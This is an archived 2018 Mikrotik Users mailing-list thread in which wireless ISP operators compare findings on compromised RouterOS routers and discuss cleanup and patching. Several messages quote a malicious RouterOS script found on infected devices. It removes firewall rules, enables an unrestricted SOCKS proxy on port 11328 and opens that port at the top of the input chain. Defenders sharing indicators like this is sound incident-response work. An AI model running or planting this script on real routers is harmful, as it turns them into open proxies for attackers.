subject:"Re\: \[Mikrotik Users\] Exploit in ROS 6.41.3\/6.42rc27"

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-10 Thread Bob Pensworth via Mikrotik-users

Yep. Busy. Busy. We’re doing the same thing. Zipping things up tight. 

 

73

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

 

From: Shawn C. Peppers  
Sent: Sunday, August 5, 2018 9:06 PM
To: Bob Pensworth 
Cc: Mikrotik Users 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

Been cleaning this up for random clients daily nowhence the reason i am 
very strongly voicing zero open ports (except l2tp and ipsec) to the outside 
network...  

 

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 


On Aug 5, 2018, at 7:57 PM, Bob Pensworth mailto:beeper.bo...@gmail.com> > wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org 
<mailto:mikrotik-users-boun...@wispa.org>  mailto:mikrotik-users-boun...@wispa.org> > On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; 
memb...@wisp.org <mailto:memb...@wisp.org> 
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-09 Thread ralphlists--- via Mikrotik-users

I only found it on boards that had Hotspot enabled. Did others find it on
ones without Hotspot?

From: mikrotik-users-boun...@wispa.org  On
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 9:06 PM
To: 'Shawn C. Peppers' ; 'Mikrotik Users'
; Bob Pensworth 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We found the same about 10 days ago.. Upgraded to most current OS and
firmware versions, changed winbox port to a 5 digit port and changed user
name from admin and 10 digit alpha numeric symbol password.

Only found it on wan interface that has a public ip. On almost all boards
including ccr devices.

Thought it was just us as we were at 6.41.3 or older.

  _  

From: mikrotik-users-boun...@wispa.org
<mailto:mikrotik-users-boun...@wispa.org>  mailto:mikrotik-users-boun...@wispa.org> > on behalf of Bob Pensworth via
Mikrotik-users mailto:mikrotik-users@wispa.org> >
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255
connection-idle-timeout=60;/ip socks access remove [/ip socks access
find];/ip firewall filter add chain=input protocol=tcp port=11328
action=accept comment="port 11328";/ip firewall filter move [/ip firewall
filter find comment="port 11328"] 1;

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org
<mailto:mikrotik-users-boun...@wispa.org>  mailto:mikrotik-users-boun...@wispa.org> > On Behalf Of Shawn C. Peppers
via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ;
memb...@wisp.org <mailto:memb...@wisp.org> 
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflo
w

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Dennis Burgess via Mikrotik-users

Yep, that  is another source, plus they have newsletters that they email out as 
well. ☺


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with www.towercoverage.com

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Grand Avenue Broadband via Mikrotik-users
Sent: Tuesday, August 7, 2018 10:39 AM
To: Mikrotik Users 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

MikroTik recently set up a blog specifically for breaking security issues, with 
an RSS feed.  I highly recommend subscribing.

https://blog.mikrotik.com/

On Aug 7, 2018, at 6:45 AM, Brian Vargyas via Mikrotik-users 
mailto:mikrotik-users@wispa.org>> wrote:

Mikrotik themselves also has published several security bulletins on their 
newsletter list.  If your not on it, go to mikrotik.com<http://mikrotik.com/> 
and scroll to the bottom and sign up for the newsletter.

Brian



From: 20153514200n behalf of
Sent: Tuesday, August 7, 2018 8:34 AM
To: Dennis Burgess; Mikrotik Users
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

How does one subscribe to your news letter?
Alex Phillips
CEO and General Manager
RBNS.net<http://RBNS.net>
HighSpeedLink.net
540-908-3993



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
mailto:mikrotik-users@wispa.org>> wrote:
You should subscribe to our newsletters as we mentioned this several weeks 
ago….  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with 
www.towercoverage.com<http://www.towercoverage.com/>

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' 
mailto:videodirectwispal...@gmail.com>>; 
'Mikrotik Users' mailto:mikrotik-users@wispa.org>>; 
Bob Pensworth mailto:beeper.bo...@gmail.com>>
Cc: JP Douros mailto:jdou...@rpmcable.com>>
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> on 
behalf of Bob Pensworth via Mikrotik-users 
mailto:mikrotik-users@wispa.org>>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>; 
memb...@wisp.org<mailto:memb...@wisp.org>
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://directlinkadmin.com/>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org<mailto:Mikrotik-users@wispa.org>
http://lists.wispa.org/mailman/listinfo/mikrotik-users
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org<mailto:Mikrotik-users@wispa.org>
http://lists.wispa.org/mailman/listinfo/mikrotik-users

--
  Grand Avenue Broadband -- Wireless Internet Service
 Circle City to Wickenburg and surrounding areas
  http://grandavebb.com

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Grand Avenue Broadband via Mikrotik-users

MikroTik recently set up a blog specifically for breaking security issues, with 
an RSS feed.  I highly recommend subscribing.

https://blog.mikrotik.com/

> On Aug 7, 2018, at 6:45 AM, Brian Vargyas via Mikrotik-users 
>  wrote:
> 
> Mikrotik themselves also has published several security bulletins on their 
> newsletter list.  If your not on it, go to mikrotik.com 
> <http://mikrotik.com/> and scroll to the bottom and sign up for the 
> newsletter.
> 
> Brian
> 
>  
> From: 20153514200n behalf of 
> Sent: Tuesday, August 7, 2018 8:34 AM
> To: Dennis Burgess; Mikrotik Users
> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>  
> How does one subscribe to your news letter?
> Alex Phillips
> CEO and General Manager
> RBNS.net
> HighSpeedLink.net
> 540-908-3993
> 
> 
> 
> On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
> mailto:mikrotik-users@wispa.org>> wrote:
> You should subscribe to our newsletters as we mentioned this several weeks 
> ago….  This is the exploit that was fixed back 4 months ago!  Lol  
> 
>  
> 
>  
> 
> Dennis Burgess, Mikrotik Certified Trainer
> 
> Author of "Learn RouterOS- Second Edition”
> 
> Link Technologies, Inc -- Mikrotik & WISP Support Services
> 
> Office: 314-735-0270  Website: http://www.linktechs.net 
> <http://www.linktechs.net/>
> Create Wireless Coverage’s with www.towercoverage.com 
> <http://www.towercoverage.com/>
>  
> 
> From: mikrotik-users-boun...@wispa.org 
> <mailto:mikrotik-users-boun...@wispa.org>  <mailto:mikrotik-users-boun...@wispa.org>> On Behalf Of Bruce Bridegwater via 
> Mikrotik-users
> Sent: Sunday, August 5, 2018 8:16 PM
> To: 'Shawn C. Peppers'  <mailto:videodirectwispal...@gmail.com>>; 'Mikrotik Users' 
> mailto:mikrotik-users@wispa.org>>; Bob Pensworth 
> mailto:beeper.bo...@gmail.com>>
> Cc: JP Douros mailto:jdou...@rpmcable.com>>
> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
> 
>  
> 
> Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to 
> our attention and providing the solution.
> 
> RPM manages our Cisco UBR10k CMTS.
> 
> Great support company.
> 
> From: mikrotik-users-boun...@wispa.org 
> <mailto:mikrotik-users-boun...@wispa.org>  <mailto:mikrotik-users-boun...@wispa.org>> on behalf of Bob Pensworth via 
> Mikrotik-users mailto:mikrotik-users@wispa.org>>
> Sent: Sunday, August 5, 2018 7:57:53 PM
> To: 'Shawn C. Peppers'; 'Mikrotik Users'
> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
> 
>  
> 
> We are finding an IP/Socks connection:
> 
> We are finding an event entry in System/Scheduler
> 
> And the (below) script in System/Script:
> 
>  
> 
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port 
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
> connection-idle-timeout=60;/ip socks access remove [/ip socks access 
> find];/ip firewall filter add chain=input protocol=tcp port=11328 
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall 
> filter find comment="port 11328"] 1;
> 
>  
> 
> -- 
> 
> Bob Pensworth, WA7BOB | General Manager
> 
> CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-, x1
> 
>  
> 
> From: mikrotik-users-boun...@wispa.org 
> <mailto:mikrotik-users-boun...@wispa.org>  <mailto:mikrotik-users-boun...@wispa.org>> On Behalf Of Shawn C. Peppers via 
> Mikrotik-users
> Sent: Friday, March 16, 2018 11:54 AM
> To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>; 
> memb...@wisp.org <mailto:memb...@wisp.org>
> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
> 
>  
> 
> I have not tested this yet but
> 
>  
> 
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow 
> <https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow>
> :: // Shawn Peppers
> 
> :: // DirectlinkAdmin.com 
> <http://directlinkadmin.com/>___
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org <mailto:Mikrotik-users@wispa.org>
> http://lists.wispa.org/mailman/listinfo/mikrotik-users 
> <http://lists.wispa.org/mailman/listinfo/mikrotik-users>
> ___
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org
> http://lists.wispa.org/mailman/listinfo/mikrotik-users

-- 
  Grand Avenue Broadband -- Wireless Internet Service
 Circle City to Wickenburg and surrounding areas
  http://grandavebb.com

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Brian Vargyas via Mikrotik-users

Mikrotik themselves also has published several security bulletins on their 
newsletter list.  If your not on it, go to mikrotik.com and scroll to the 
bottom and sign up for the newsletter.

Brian



From: 20153514200n behalf of
Sent: Tuesday, August 7, 2018 8:34 AM
To: Dennis Burgess; Mikrotik Users
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

How does one subscribe to your news letter?
Alex Phillips
CEO and General Manager
RBNS.net
HighSpeedLink.net
540-908-3993



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
mailto:mikrotik-users@wispa.org>> wrote:
You should subscribe to our newsletters as we mentioned this several weeks 
ago….  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with 
www.towercoverage.com<http://www.towercoverage.com>

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' 
mailto:videodirectwispal...@gmail.com>>; 
'Mikrotik Users' mailto:mikrotik-users@wispa.org>>; 
Bob Pensworth mailto:beeper.bo...@gmail.com>>
Cc: JP Douros mailto:jdou...@rpmcable.com>>
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> on 
behalf of Bob Pensworth via Mikrotik-users 
mailto:mikrotik-users@wispa.org>>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>; 
memb...@wisp.org<mailto:memb...@wisp.org>
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org<mailto:Mikrotik-users@wispa.org>
http://lists.wispa.org/mailman/listinfo/mikrotik-users
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread alex phillips via Mikrotik-users

How does one subscribe to your news letter?
*Alex Phillips*
CEO and General Manager
RBNS.net
HighSpeedLink.net
*540-908-3993*



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> You should subscribe to our newsletters as we mentioned this several weeks
> ago….  This is the exploit that was fixed back 4 months ago!  Lol
>
>
>
>
>
> *Dennis Burgess, Mikrotik Certified Trainer *
>
> Author of "Learn RouterOS- Second Edition”
>
> *Link Technologies, Inc* -- Mikrotik & WISP Support Services
>
> *Office*: 314-735-0270  Website: http://www.linktechs.net
>
> Create Wireless Coverage’s with www.towercoverage.com
>
>
>
> *From:* mikrotik-users-boun...@wispa.org 
> *On Behalf Of *Bruce Bridegwater via Mikrotik-users
> *Sent:* Sunday, August 5, 2018 8:16 PM
> *To:* 'Shawn C. Peppers' ; 'Mikrotik
> Users' ; Bob Pensworth 
> *Cc:* JP Douros 
> *Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it
> to our attention and providing the solution.
>
> RPM manages our Cisco UBR10k CMTS.
>
> Great support company.
> --
>
> *From:* mikrotik-users-boun...@wispa.org 
> on behalf of Bob Pensworth via Mikrotik-users 
> *Sent:* Sunday, August 5, 2018 7:57:53 PM
> *To:* 'Shawn C. Peppers'; 'Mikrotik Users'
> *Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> We are finding an IP/Socks connection:
>
> We are finding an event entry in System/Scheduler
>
> And the (below) script in System/Script:
>
>
>
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255
> connection-idle-timeout=60;/ip socks access remove [/ip socks access
> find];/ip firewall filter add chain=input protocol=tcp port=11328
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall
> filter find comment="port 11328"] 1;
>
>
>
> --
>
> Bob Pensworth, WA7BOB | General Manager
>
> CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-, x1
>
>
>
> *From:* mikrotik-users-boun...@wispa.org 
> *On Behalf Of *Shawn C. Peppers via Mikrotik-users
> *Sent:* Friday, March 16, 2018 11:54 AM
> *To:* mikrotik-users@wispa.org; memb...@wisp.org
> *Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> I have not tested this yet but
>
>
>
>
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
>
> :: // Shawn Peppers
>
> :: // DirectlinkAdmin.com
> ___
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org
> http://lists.wispa.org/mailman/listinfo/mikrotik-users
>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Dennis Burgess via Mikrotik-users

You should subscribe to our newsletters as we mentioned this several weeks 
ago  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition"
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage's with www.towercoverage.com

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' ; 'Mikrotik Users' 
; Bob Pensworth 
Cc: JP Douros 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> on 
behalf of Bob Pensworth via Mikrotik-users 
mailto:mikrotik-users@wispa.org>>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> 
mailto:mikrotik-users-boun...@wispa.org>> On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>; 
memb...@wisp.org<mailto:memb...@wisp.org>
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users


Right.

I wanted to make sure people know that there are lots of things that may 
or may not be impacted if a device is infected.  You either have to 
totally delete the configuration and restore from backup or you need to 
go through every menu item and make sure they have not been changed.



On 8/6/2018 6:55, Tim wrote:


This has been detected in devices with earlier versions of ROS.

*From:*mikrotik-users-boun...@wispa.org 
 *On Behalf Of *Scott Reed via 
Mikrotik-users

*Sent:* Monday, August 6, 2018 5:58 AM
*To:* mikrotik-users@wispa.org
*Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all 
I remember off the top of my head.


On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment
~ "port [0-9]*"];/ip socks set enabled=yes port=11328
max-connections=255 connection-idle-timeout=60;/ip socks access
remove [/ip socks access find];/ip firewall filter add chain=input
protocol=tcp port=11328 action=accept comment="port 11328";/ip
firewall filter move [/ip firewall filter find comment="port
11328"] 1;

-- 


Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-, x1

*From:* mikrotik-users-boun...@wispa.org
<mailto:mikrotik-users-boun...@wispa.org>

<mailto:mikrotik-users-boun...@wispa.org> *On Behalf Of *Shawn C.
Peppers via Mikrotik-users
*Sent:* Friday, March 16, 2018 11:54 AM
*To:* mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>;
memb...@wisp.org <mailto:memb...@wisp.org>
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but


https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>




___

Mikrotik-users mailing list

Mikrotik-users@wispa.org <mailto:Mikrotik-users@wispa.org>

http://lists.wispa.org/mailman/listinfo/mikrotik-users



--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained

<http://www.avg.com/email-signature?utm_medium=email_source=link_campaign=sig-email_content=emailclient>



Virus-free. www.avg.com 
<http://www.avg.com/email-signature?utm_medium=email_source=link_campaign=sig-email_content=emailclient> 





--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained



---
This email has been checked for viruses by AVG.
https://www.avg.com
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Tim via Mikrotik-users

This has been detected in devices with earlier versions of ROS.

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Scott Reed via Mikrotik-users
Sent: Monday, August 6, 2018 5:58 AM
To: mikrotik-users@wispa.org
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, add 5 
firewall filter rules to redirect forward traffic, change DNS server, enable 
DDNS, add IP Web Proxy rules and more, but that is all I remember off the top 
of my head.

On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org 
<mailto:mikrotik-users-boun...@wispa.org>   
<mailto:mikrotik-users-boun...@wispa.org>  On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; 
memb...@wisp.org <mailto:memb...@wisp.org>
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org <mailto:Mikrotik-users@wispa.org>
http://lists.wispa.org/mailman/listinfo/mikrotik-users

--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained

<http://www.avg.com/email-signature?utm_medium=email_source=link_campaign=sig-email_content=emailclient>

Virus-free.  
<http://www.avg.com/email-signature?utm_medium=email_source=link_campaign=sig-email_content=emailclient>
 www.avg.com 

---
This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users

It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all I 
remember off the top of my head.



On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:


We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ 
"port [0-9]*"];/ip socks set enabled=yes port=11328 
max-connections=255 connection-idle-timeout=60;/ip socks access remove 
[/ip socks access find];/ip firewall filter add chain=input 
protocol=tcp port=11328 action=accept comment="port 11328";/ip 
firewall filter move [/ip firewall filter find comment="port 11328"] 1;


--

Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC  | (360) 928-, x1

*From:* mikrotik-users-boun...@wispa.org 
 *On Behalf Of *Shawn C. Peppers via 
Mikrotik-users

*Sent:* Friday, March 16, 2018 11:54 AM
